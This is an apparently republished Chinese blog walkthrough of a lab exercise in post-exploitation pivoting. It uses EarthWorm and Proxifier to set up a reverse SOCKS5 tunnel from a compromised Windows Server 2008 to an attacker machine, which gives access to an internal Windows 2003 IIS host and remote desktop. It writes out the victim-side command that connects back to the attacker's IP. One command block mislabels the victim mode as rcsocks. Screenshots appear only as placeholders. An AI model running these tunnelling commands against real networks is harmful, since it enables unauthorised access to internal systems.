后渗透——内网转发之利用EarthWorm与proxifier搭建反向代理服务器

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。
Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。

反向
攻击者
ew.exe -s rcsocks -l 1080 -e 8888
受害者win2008
ew.exe -s rcsocks -d 攻击者ip -e 8888

在这里插入图片描述

实验环境:

  • Windows Server 2008 R2 x64(192.168.70.128、10.1.1.1)
  • Windows Server 2003(10.1.1.2)
  • IIS服务器
  • EarthWorm
  • proxifier

在这里插入图片描述

环境搭建:

为win2008添加一块网卡,ip设为10.1.1.1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

将win2003的网络选成VM1
在这里插入图片描述
将ip设为10.1.1.2
在这里插入图片描述
在这里插入图片描述
将win2003的IIS服务器写上网页内容,并且保证win2008能够访问到
在这里插入图片描述

两台机器开启均开启远程桌面
在这里插入图片描述
在这里插入图片描述
将EarthWorm上传到win2008上
在这里插入图片描述

在这里插入图片描述

模拟实验:

进入ew所在目录cd E:\学习资料\后渗透\day0318\ew
在这里插入图片描述
输入ew_for_Win.exe -s rcsocks -l 1080 -e 8888
在这里插入图片描述
win2008中输入ew.exe -s rssocks -d 192.168.0.14 -e 8888
在这里插入图片描述
然后proxifier代理ip设为127.0.0.1端口为1080
在这里插入图片描述
连接成功后会有大量数据传输
在这里插入图片描述
此時远程桌面也是可以连接的
在这里插入图片描述
在这里插入图片描述

发布了99 篇原创文章 · 获赞 949 · 访问量 15万+

猜你喜欢

转载自blog.csdn.net/weixin_45728976/article/details/104955334
今日推荐